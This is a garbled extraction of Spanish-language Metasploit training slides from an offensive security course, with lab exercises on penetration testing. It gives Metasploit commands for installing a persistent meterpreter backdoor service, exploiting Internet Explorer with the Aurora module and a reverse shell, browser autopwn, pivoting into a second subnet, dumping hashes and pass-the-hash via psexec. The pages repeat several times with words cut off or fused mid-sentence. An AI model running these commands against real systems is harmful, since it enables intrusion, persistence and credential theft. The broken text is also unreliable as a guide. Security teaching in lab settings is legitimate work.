Colocar una puerta trasera con meterpreter como servicio: Teniendo presente que meterpreter nos permite hacer muchísimas tareas de explotación y post-explotación en la maquina víctima, vamos a proceder a dejar a meterpreter como una puerta trasera en la maquina víctima, para que nos permita conectarnos a la victima cada que necesitemos

explotación directamente de una vulnerabilidad conocida, ya que esta puede ser solventada por el administrador de red. Para lograr esta tarea, se debe de hacer

Estar en una consola meterpreter, la cual se lora con la explotaciónvulnerabilidad conocida en la victima.

Finalmente observamos que el módulos nos obtuvo todas las contraseñas (Darle

e meterpreter a nivel de explotación y

, Windows XP SP2 y

s maquinas Linux Backtrack y están conectados en el mismo segmento de red, y que hay ping

medios al respecto de los mprender mejor el trabajo de análisis

Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando e exploits dentro de metasploit, y con la consola meterpreter

Teniendo presente que explotación en la

r a meterpreter como una puerta trasera en la permita conectarnos a la victima cada que necesitemos

de una vulnerabilidad conocida, ya que Para lograr esta tarea, se debe de hacer

explotación de alguna

Page 37: Cpods training-metasploit

Certified Offensive and Defensive Security

� Ejecutar el siguiente comando para colocar meterpreter como un máquina victima, los cual se logra ejecutando el siguiente comando:

� Luego debemos de ejecutarsiguiente comando: use exploit/multi/handler

� Posteriormente selecciona el � Para asignar este PAYLOAD al exploit, se ejecuta el siguiente comando:

windows/metsvc_bind_tcp

� Luego se le asignan las variables al exploit, que para el caso son RHOST y el puerto en el cual quedo a la escucha el servicio de meterpreter

� Luego se ejecuta el exploit

Paso 2: Colocar una puerta trasera con meterpreter como servicio persistente

Teniendo presente que meterpreter nos permite hacer muchísimas tareas de explotación y post-explotación en la mservicios persistente que este llamando al atacante por un puerto determtiempo determinado, lo cual se logra realizando lo siguiente:

� ejecutar el siguiente comando: 192.168.56.101

diferente para cada estudiante)(Lo que hace el comando anterior, es básicamente lo siguienteA se coloca una conexión a la escucha en la maquina del atacantgarantiza que la puerta trasera que colocamos se inicie cada vez que la maquina victima tiempo para la asignamos un puerdirección IP el atacante donde esta una conexión a la escucha)

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Ejecutar el siguiente comando para colocar meterpreter como un victima, los cual se logra ejecutando el siguiente comando: run metsvc

ejecutar el exploit multi/handler, lo cual se logra ejecutando el use exploit/multi/handler

selecciona el siguiente PAYLOAD windows/metsvc_bind_tcp

Para asignar este PAYLOAD al exploit, se ejecuta el siguiente comando:windows/metsvc_bind_tcp.

Luego se le asignan las variables al exploit, que para el caso son RHOST y el puerto en escucha el servicio de meterpreter

Luego se ejecuta el exploit

Colocar una puerta trasera con meterpreter como servicio persistente

Teniendo presente que meterpreter nos permite hacer muchísimas tareas de explotación en la maquina víctima, vamos a proceder a dejar un

servicios persistente que este llamando al atacante por un puerto determtiempo determinado, lo cual se logra realizando lo siguiente:

ejecutar el siguiente comando: run persistence -A -S -U

192.168.56.101 (Recordar que aquí se coloca la IP de Backtrack, que será diferente para cada estudiante) Lo que hace el comando anterior, es básicamente lo siguiente

se coloca una conexión a la escucha en la maquina del atacantgarantiza que la puerta trasera que colocamos se inicie cada vez que la maquina victima Windows arranque. Con la opción -i se asigna un intervalo de tiempo para la conexión de la victima hacia el atacante, con la

un puerto en la maquina del atacante, y la opción dirección IP el atacante donde esta una conexión a la escucha)

Ejecutar el siguiente comando para colocar meterpreter como un servicios en la run metsvc –A

, lo cual se logra ejecutando el

windows/metsvc_bind_tcp

Para asignar este PAYLOAD al exploit, se ejecuta el siguiente comando: set PAYLOAD

Luego se le asignan las variables al exploit, que para el caso son RHOST y el puerto en

Colocar una puerta trasera con meterpreter como servicio persistente: Teniendo presente que meterpreter nos permite hacer muchísimas tareas de

aquina víctima, vamos a proceder a dejar un servicios persistente que este llamando al atacante por un puerto determinado, y cada

U -i 60 -p 4321 –r

(Recordar que aquí se coloca la IP de Backtrack, que será

Lo que hace el comando anterior, es básicamente lo siguiente: Con la opción -se coloca una conexión a la escucha en la maquina del atacante, la opción -S

garantiza que la puerta trasera que colocamos se inicie cada vez que la se asigna un intervalo de

, con la opción -p , y la opción -r indica la

dirección IP el atacante donde esta una conexión a la escucha)

Page 38: Cpods training-metasploit

Certified Offensive and Defensive Security

Práctica de laboratorio númer

Objetivos: Aprender cómo trabajan y se ejecutan los procliente (Client Sie)

Recursos: VMWARE, Metasploit Framework,

Observaciones:

� Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 y XP, entre ambas maquinas.

� Es altamente importante tener conocimientos básicosservicios de red que se están atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado.

� Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando con la ejecución de exploits dentro de metasploit, y con la consola meterpreter

Ejecución de la práctica de laboratorio 7

Paso 1: Explotación de Internet Explorer

explotación del lado del cliente, vamos a usar un exploit que se aprovecha de una vulnerabilidad conocida en Internet explorer, conocida como operacioneste exploit, debemos de realiza lo

� Seleccionar el exploit � Asignarlo a la consola con el comando:

exploit/windows/browser/ms10_002_aurora

� seleccionar un PAYLOAD, para el caso vamos a usar windows/meterpreter/reverse_tcp

� set URIPATH / � set LHOST 192.168.33.129� set LPORT 443 � exploit

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Práctica de laboratorio número 7 "Explotación Básica" del lado del cliente

Aprender cómo trabajan y se ejecutan los procesos de explotación del lado del

tasploit Framework, Windows XP SP2 y Backtrack 5

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y están conectados en el mismo segmento de red, y que hay ping

entre ambas maquinas. Es altamente importante tener conocimientos básicos-medios al respecto de los servicios de red que se están atacando, para comprender mejor el trabajo de análisis

penetration testing realizado. Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando con la ejecución de exploits dentro de metasploit, y con la consola meterpreter

de la práctica de laboratorio 7:

tación de Internet Explorer (Aurora): Comenzando con los procesos de del lado del cliente, vamos a usar un exploit que se aprovecha de una

da en Internet explorer, conocida como operacion auroradebemos de realiza lo siguiente:

Seleccionar el exploit exploit/windows/browser/ms10_002_aurora a la consola con el comando:

exploit/windows/browser/ms10_002_aurora

seleccionar un PAYLOAD, para el caso vamos a usar erpreter/reverse_tcp

set LHOST 192.168.33.129

o 7 "Explotación Básica" del lado del cliente

cesos de explotación del lado del

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y conectados en el mismo segmento de red, y que hay ping

medios al respecto de los servicios de red que se están atacando, para comprender mejor el trabajo de análisis

Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando con la ejecución de exploits dentro de metasploit, y con la consola meterpreter

con los procesos de del lado del cliente, vamos a usar un exploit que se aprovecha de una

aurora. Para ejecutar

a la consola con el comando: use

seleccionar un PAYLOAD, para el caso vamos a usar set payload

Page 39: Cpods training-metasploit

Certified Offensive and Defensive Security

Paso 2: Explotación de navegadores con el modulo Browser autopwn

procesos de explotación del ladoauxiliary/server/browser_autopwn

varios navegadores. Para ejecutar este exploit, debemos de realiza lo siguiente:

� Seleccionar el exploit auxiliary/server/browser_autopwn

� Asignar este exploit con el comanejecutar el siguiente comando:

� Luego se debe de asignar la � Finalmente se le da el comando exploit, y se le envía a la victima la

web que acaba de cargar metasploit.

Anotación: hay que darle un poco de paciencia a la ejecución de este exploitvarios códigos de explotaciónvíctima.

Práctica de laboratorio númer

Objetivos: Aprender cómo se realiza el proces

Recursos: VMWARE, Metasploit Framework,

Observaciones:

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Explotación de navegadores con el modulo Browser autopwn: Continuando con los rocesos de explotación del lado, ahora vamos a configurar el exploit llamado

liary/server/browser_autopwn, el cual se aprovecha de vulnerabilidadesvarios navegadores. Para ejecutar este exploit, debemos de realiza lo siguiente:

exploit auxiliary/server/browser_autopwn Asignar este exploit con el comando use Para asignar este exploit, debemos de ejecutar el siguiente comando: use exploit auxiliary/server/browser_autopwn

Luego se debe de asignar la variable LHOST y la variable URIPATH. Finalmente se le da el comando exploit, y se le envía a la victima laweb que acaba de cargar metasploit.

hay que darle un poco de paciencia a la ejecución de este exploitvarios códigos de explotación y al final nos muestra las sesiones que logro abrir en la máquina

Práctica de laboratorio número 8 "Pivoting"

se realiza el proceso de pivoting entre dos subrede

tasploit Framework, Windows ServerWindows XP SP2

ntinuando con los , ahora vamos a configurar el exploit llamado use

vulnerabilidades conocidas de varios navegadores. Para ejecutar este exploit, debemos de realiza lo siguiente:

exploit, debemos de exploit auxiliary/server/browser_autopwn

Finalmente se le da el comando exploit, y se le envía a la victima la URL del servidor

hay que darle un poco de paciencia a la ejecución de este exploit ya que lanza y al final nos muestra las sesiones que logro abrir en la máquina

o de pivoting entre dos subrede

Windows XP SP2 y Backtrack 5

Page 40: Cpods training-metasploit

Certified Offensive and Defensive Security

� Antes de proceder a realizar Windows 2003 y XP, entre ambas maquinas.

� Esta práctica debe de hacerse desde dos maquinas físicas, 4 maquinas virtuales

Anotación general de la práctica

Para la siguiente practica, se debe de tener presente el siguiente escenario:

Nota: Tener presente que en el esquema anterior los puntos rojos representan dos tarjetas dered en el servidor Windows 2003, cada una de ellas debe de subredes (Segmentos de red). La que está conectada al segmento de red que está en bridge,esta suministrada directamente por el servidor DHCP de la maquina local. Y la otra tarjetapodemos asignarle una dirección IP como la primero prender el Windows server y renombrar la tarjeta de red actual como WAN, y la otraque se va a crear, se renombra como LAN Es altamente importante ensayar que el si se presente ping entre los diferen

de red antes de comenzar la práctica.

Pasos para ejecutar la práctica:

Los pasos que se deben de realizar paso para poder lograr el proceso de maquina victima (Windows XP Victima final) es el siguiente: 1) Lo primero es configurar las tarjetas de red para el laboratorio, las cuales se configuran de lasiguiente manera:

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y están conectados en el mismo segmento de red, y que hay ping

entre ambas maquinas. Esta práctica debe de hacerse desde dos maquinas físicas, 4 maquinas virtuales

al de la práctica 8:

Para la siguiente practica, se debe de tener presente el siguiente escenario:

Tener presente que en el esquema anterior los puntos rojos representan dos tarjetas dered en el servidor Windows 2003, cada una de ellas debe de esta configurada con diferentessubredes (Segmentos de red). La que está conectada al segmento de red que está en bridge,esta suministrada directamente por el servidor DHCP de la maquina local. Y la otra tarjetapodemos asignarle una dirección IP como la 10.0.0.1 mascara 255.255.255.0. Tener presenteprimero prender el Windows server y renombrar la tarjeta de red actual como WAN, y la otraque se va a crear, se renombra como LAN.

Es altamente importante ensayar que el si se presente ping entre los diferen

de red antes de comenzar la práctica.

Pasos para ejecutar la práctica:

Los pasos que se deben de realizar paso para poder lograr el proceso de maquina victima (Windows XP Victima final) es el siguiente:

igurar las tarjetas de red para el laboratorio, las cuales se configuran de la

la práctica, verificar que las maquinas Linux Backtrack y están conectados en el mismo segmento de red, y que hay ping

Esta práctica debe de hacerse desde dos maquinas físicas, 4 maquinas virtuales

Tener presente que en el esquema anterior los puntos rojos representan dos tarjetas de esta configurada con diferentes

subredes (Segmentos de red). La que está conectada al segmento de red que está en bridge, esta suministrada directamente por el servidor DHCP de la maquina local. Y la otra tarjeta

10.0.0.1 mascara 255.255.255.0. Tener presente primero prender el Windows server y renombrar la tarjeta de red actual como WAN, y la otra

Es altamente importante ensayar que el si se presente ping entre los diferentes segmentos

Los pasos que se deben de realizar paso para poder lograr el proceso de pivoting en la

igurar las tarjetas de red para el laboratorio, las cuales se configuran de la

Page 41: Cpods training-metasploit

Certified Offensive and Defensive Security

Windows Server: debe de tener dos tarjetas de red una conectada en modo bridge, y lasegunda la vamos a conectar en modo VMNET2. Justo como se puede apreciar imagen.

Recordar que la que está en bridge, obtiene DHCP por medio de la red LAN, y la que estáVMNET2 se le configura manualmente una 10.0.0.1/24. Luego se configura la maquina Windows XP y la tarjeta de red también la colocamos coVMNET2, y asignamos otra Dirección IP del mismo rango que en Windows server, la cualpuede ser 10.0.0.11/24. Tener presente colocarle en la configuración de la tarjeta de redWindows XP como servidor DNS y puerta de enlace la dirección IP de Windows 2) Una vez configuradas las tarjetas de red, el siguiente paso es integrar a Windows XP aldominio que se encuentra en Windows Server 2003. 3) El tercer paso es vulnerar a Windows Server por su tarjeta de red configurada en modoBridge. Lo anterior se hace desde Linux BT5. Recordar que BT5 debe de estar configuradotambién en modo Bridge, y por el segmento de red de Windows Server. Se recomiendaexploit al cual sea vulnerable, y en el PAYLOAD usar Windows Meterpreter 4) El cuarto paso es averiguar cuantas tarjetas de red tiene el equipo víctima, y lade estas. Si todo va hasta aquí bien, se deben de identificar 2 tarjetas de red Adicionalmente desde meterpreter se puede lanzar el comando 10.0.0.0/24.

Con el anterior comando se puede identificar otros host conectados al segmento de redalterno del servidor 2003. 5) Salir de meterpreter con el comando nuestra maquina, lo cual hacemos con el siguie route add 10.0.0.0 255.255.255.0 1 (ojo el ultimo 1 pertenece a la sesión que se abrió

Meterpreter)

Luego damos el comando route print

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

debe de tener dos tarjetas de red una conectada en modo bridge, y lasegunda la vamos a conectar en modo VMNET2. Justo como se puede apreciar

Recordar que la que está en bridge, obtiene DHCP por medio de la red LAN, y la que estáVMNET2 se le configura manualmente una 10.0.0.1/24.

Luego se configura la maquina Windows XP y la tarjeta de red también la colocamos coVMNET2, y asignamos otra Dirección IP del mismo rango que en Windows server, la cualpuede ser 10.0.0.11/24. Tener presente colocarle en la configuración de la tarjeta de redWindows XP como servidor DNS y puerta de enlace la dirección IP de Windows

2) Una vez configuradas las tarjetas de red, el siguiente paso es integrar a Windows XP aldominio que se encuentra en Windows Server 2003.

3) El tercer paso es vulnerar a Windows Server por su tarjeta de red configurada en modoor se hace desde Linux BT5. Recordar que BT5 debe de estar configurado

también en modo Bridge, y por el segmento de red de Windows Server. Se recomiendaexploit al cual sea vulnerable, y en el PAYLOAD usar Windows Meterpreter Reverse TCP.

uarto paso es averiguar cuantas tarjetas de red tiene el equipo víctima, y lade estas. Si todo va hasta aquí bien, se deben de identificar 2 tarjetas de red.

Adicionalmente desde meterpreter se puede lanzar el comando run arp_scanner

Con el anterior comando se puede identificar otros host conectados al segmento de red

5) Salir de meterpreter con el comando background para proceder a agregar una ruta anuestra maquina, lo cual hacemos con el siguiente comando:

route add 10.0.0.0 255.255.255.0 1 (ojo el ultimo 1 pertenece a la sesión que se abrió

route print para ver la ruta.

debe de tener dos tarjetas de red una conectada en modo bridge, y la segunda la vamos a conectar en modo VMNET2. Justo como se puede apreciar en la siguiente

Recordar que la que está en bridge, obtiene DHCP por medio de la red LAN, y la que está en

Luego se configura la maquina Windows XP y la tarjeta de red también la colocamos como VMNET2, y asignamos otra Dirección IP del mismo rango que en Windows server, la cual puede ser 10.0.0.11/24. Tener presente colocarle en la configuración de la tarjeta de red de Windows XP como servidor DNS y puerta de enlace la dirección IP de Windows Server.

2) Una vez configuradas las tarjetas de red, el siguiente paso es integrar a Windows XP al

3) El tercer paso es vulnerar a Windows Server por su tarjeta de red configurada en modo or se hace desde Linux BT5. Recordar que BT5 debe de estar configurado

también en modo Bridge, y por el segmento de red de Windows Server. Se recomienda usar un Reverse TCP.

uarto paso es averiguar cuantas tarjetas de red tiene el equipo víctima, y la configuración

run arp_scanner –r

Con el anterior comando se puede identificar otros host conectados al segmento de red

para proceder a agregar una ruta a

route add 10.0.0.0 255.255.255.0 1 (ojo el ultimo 1 pertenece a la sesión que se abrió con

Page 42: Cpods training-metasploit

Certified Offensive and Defensive Security

Si se presentan problemas con adicionar la ruta, se puede optar por los siguientes run autorun –h y luego run autoroute –s 10.0.0.0/24

O también puede usarse el modulo auxiliar llamado Este nos va a solicitar la sesión abierta y la subred a la cual queremos enrutarnos 6) Una vez que se tiene la ruta, el siguiente paso es sacar los Hash de los usuarios delllamado METASPLOIT. Lo anterior ya se vio en 7) El siguiente paso es buscar host activos en la red, para lo cua podemos hacer uso delmodulo auxiliar de Metasploit llamadolos puertos, que para el caso vamos a darle 80,135,139,445, y nos pide la caso solo vamos a comenzar el Scanning desde la IP 10.0.0.1 hasta la 10.0.0.15.damos run, y si todo va bien, debemos de ver la IP 10.0.0.11, perteneciente atodos sus respectivos puertos abiertos. Lanzar exploit:

8) Se puede proceder a lanzar de nuevo el exploit NETAPI, pero esta vez se realiza contra elequipo Windows XP, pero esta vez se debe de ejecutar el PAYLOAD

Optativo: Lanzar otro exploit:

9) También podemos lanzar otro ataque al protocolo SMB, lo cual podemos realizar con elPAYLOAD llamado: exploit/windows/smb/psexec

deben de asignar las siguientes variables (Tener presente que para este exploit selos hash que obtuvieron en pasos anteriores de esta práctica). RHOST: 10.0.0.11 SMBUser administrator SMBPass se le coloca el hash Pegar el HASH, en lo que respecta al contenido que esta antes de :::)SMBDomain (Colocar el nombre del dominio, el cual debe de ser METASPLOIT)Y por último el PAYLOAD, el cual es Meterpreter/biFinalmente se ejecuta con el comando run

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Si se presentan problemas con adicionar la ruta, se puede optar por los siguientes

s 10.0.0.0/24

O también puede usarse el modulo auxiliar llamado post/windows/manage/autoroute

Este nos va a solicitar la sesión abierta y la subred a la cual queremos enrutarnos

a ruta, el siguiente paso es sacar los Hash de los usuarios delo anterior ya se vio en prácticas de laboratorio pasadas.

El siguiente paso es buscar host activos en la red, para lo cua podemos hacer uso delde Metasploit llamado: auxiliary/scanner/portscan/tcp. Este módulo nos

los puertos, que para el caso vamos a darle 80,135,139,445, y nos pide la víctimacaso solo vamos a comenzar el Scanning desde la IP 10.0.0.1 hasta la 10.0.0.15.damos run, y si todo va bien, debemos de ver la IP 10.0.0.11, perteneciente atodos sus respectivos puertos abiertos.

Se puede proceder a lanzar de nuevo el exploit NETAPI, pero esta vez se realiza contra elWindows XP, pero esta vez se debe de ejecutar el PAYLOAD meterpreter/bind_tcp

Lanzar otro exploit:

También podemos lanzar otro ataque al protocolo SMB, lo cual podemos realizar con elexploit/windows/smb/psexec. Cuando seleccionemos este PAYLOAD,

deben de asignar las siguientes variables (Tener presente que para este exploit selos hash que obtuvieron en pasos anteriores de esta práctica).

obtenido en puntos anteriores de esta práctica (Ojo copiar yel HASH, en lo que respecta al contenido que esta antes de :::)

(Colocar el nombre del dominio, el cual debe de ser METASPLOIT)el PAYLOAD, el cual es Meterpreter/bind_tcp.

Finalmente se ejecuta con el comando run

Si se presentan problemas con adicionar la ruta, se puede optar por los siguientes comandos:

post/windows/manage/autoroute. Este nos va a solicitar la sesión abierta y la subred a la cual queremos enrutarnos

a ruta, el siguiente paso es sacar los Hash de los usuarios del dominio pasadas.

El siguiente paso es buscar host activos en la red, para lo cua podemos hacer uso del . Este módulo nos pide

víctima, que para el caso solo vamos a comenzar el Scanning desde la IP 10.0.0.1 hasta la 10.0.0.15. Luego le damos run, y si todo va bien, debemos de ver la IP 10.0.0.11, perteneciente a Windows XP, con

Se puede proceder a lanzar de nuevo el exploit NETAPI, pero esta vez se realiza contra el meterpreter/bind_tcp

También podemos lanzar otro ataque al protocolo SMB, lo cual podemos realizar con el ccionemos este PAYLOAD, se le

deben de asignar las siguientes variables (Tener presente que para este exploit se requiere de

obtenido en puntos anteriores de esta práctica (Ojo copiar y

(Colocar el nombre del dominio, el cual debe de ser METASPLOIT)